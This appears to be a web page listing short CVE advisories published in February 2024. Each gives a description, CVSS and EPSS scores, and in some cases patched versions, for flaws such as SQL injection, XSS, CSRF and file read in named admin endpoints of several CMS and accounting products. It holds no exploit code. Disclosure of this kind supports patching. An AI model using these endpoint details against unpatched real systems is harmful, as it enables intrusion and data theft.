Security Vulnerabilities - CVEs Published In February 2024
LedgerSMB is a free web-based double-entry accounting system. When a LedgerSMB database administrator has an active session in /setup.pl, an attacker can trick the admin into clicking on a link which automatically submits a request to setup.pl without the admin's consent. This request can be used to create a new user account with full application (/login.pl) privileges, leading to privilege escalation. The vulnerability is patched in versions 1.10.30 and 1.11.9.
CVSS Score
7.5
EPSS Score
0.002
Published
2024-02-02
JFinalCMS 5.0.0 is vulnerable to SQL injection via /admin/content/data.
CVSS Score
9.8
EPSS Score
0.001
Published
2024-02-02
MRCMS 3.0 contains a Cross-Site Scripting (XSS) vulnerability via /admin/system/saveinfo.do.
CVSS Score
5.4
EPSS Score
0.001
Published
2024-02-02
MRCMS 3.0 contains an Arbitrary File Read vulnerability in /admin/file/edit.do as the incoming path parameter is not filtered.
CVSS Score
7.5
EPSS Score
0.001
Published
2024-02-02
Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the update_post.php component.
CVSS Score
8.8
EPSS Score
0.008
Published
2024-02-02
open-irs is an issue response robot that reponds to issues in the installed repository. The `.env` file was accidentally uploaded when working with git actions. This problem is fixed in 1.0.1. Discontinuing all sensitive keys and turning into secrets.
CVSS Score
7.6
EPSS Score
0.001
Published
2024-02-02
An unchecked return value vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow local authenticated administrators to place the system in a state that could lead to a crash or other unintended behaviors via unspecified vectors.
We have already fixed the vulnerability in the following versions:
QTS 5.1.5.2645 build 20240116 and later
QuTS hero h5.1.5.2647 build 20240118 and later
CVSS Score
3.4
EPSS Score
0.0
Published
2024-02-02
Ylianst MeshCentral 1.1.16 suffers from Use of a Broken or Risky Cryptographic Algorithm.
CVSS Score
7.5
EPSS Score
0.0
Published
2024-02-02
A potential buffer overflow exists in the Bluetooth LE HCI CPC sample application in the Gecko SDK which may result in a denial of service or remote code execution
CVSS Score
7.5
EPSS Score
0.032
Published
2024-02-02
A vulnerability classified as problematic has been found in Nsasoft NBMonitor Network Bandwidth Monitor 1.6.5.0. This affects an unknown part of the component Registration Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252675. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
CVSS Score
3.3
EPSS Score
0.0
Published
2024-02-02